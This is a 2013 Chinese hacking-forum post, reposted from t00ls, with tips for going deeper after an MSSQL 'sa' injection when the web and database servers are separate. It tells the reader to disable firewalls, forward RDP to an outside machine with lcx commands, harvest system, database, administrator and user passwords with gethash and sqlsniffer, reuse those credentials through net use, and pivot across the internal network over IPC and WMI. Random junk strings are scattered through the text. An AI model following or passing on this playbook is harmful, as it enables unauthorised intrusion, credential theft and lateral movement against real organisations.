找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1990|回复: 0
打印 上一主题 下一主题

SA权限网站和数据库分离的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:46:01 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。  x9 _5 v+ O) Z& X% b

# U% }  o1 V7 f/ q* ?" T
$ O6 a# y# }3 k4 y- {$ X1 N
3 c, e  o) n6 {  q2 FSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出), L8 u. p0 z( V4 z; v
, b8 e- B- `$ F: y
  }, Z( A& e6 T' d' s$ w/ @
一、DB机有公网IP.
) N# r  f+ a9 ?7 p% C3 B$ K6 g3 e  ~: S8 V
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.4 S* Z. `" E5 ]% @) F

' E0 Q. i  t7 J7 D4 n9 }" e
/ M3 \. j+ W4 H) Y, I  V2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.% q. H6 v$ N, _8 G+ C$ w' o$ z

7 G. Z8 y5 B4 Y$ q
7 u9 s" x3 l" z7 \5 E/ Z3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
, ^: y6 _+ f2 m5 O: T" ]# e4 T" |3 F1 W& p
: c' D. G$ S( @' ?; w2 B+ `
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.4 Z" @$ m$ j8 z8 x, ~/ X; R

3 l0 I$ O' G% R1 D! i# o% A. w) _7 [+ p& K

$ ]' P, L# \: A# f  G2 R8 H二、DB机只有内网IP
# r' f5 P+ l% d: g; j4 Q' U! }% O5 W$ g9 v; c
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
% ~" [7 {- t( ~
3 \' R( v; k7 A( Q+ w5 n
* ], l0 D3 Y$ a* f. q2:停掉防火墙和IP策略再从内往外扫描.$ V* `6 o1 j$ |0 X# a
9 ^' ?8 F0 _: ?0 b6 F+ }8 Z
0 a# ]0 ?9 t; b1 ]
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
4 Y7 c+ K( [$ o. t# Y" O
  w) W1 f5 l" R3 p
5 |: C. K' @3 g4 `) W0 j! S4:学会密码规律分析往往会有惊喜.  m  t8 Q, a  c3 V) I2 B9 ?
: Y/ t- N% N  ^$ `
  p; K5 ?( Z0 g& R2 O9 O
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等5 n7 |. z/ N# `* L

* V! s9 p' k& G5 n, x$ q: ^& z& f9 R9 J& U* y
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表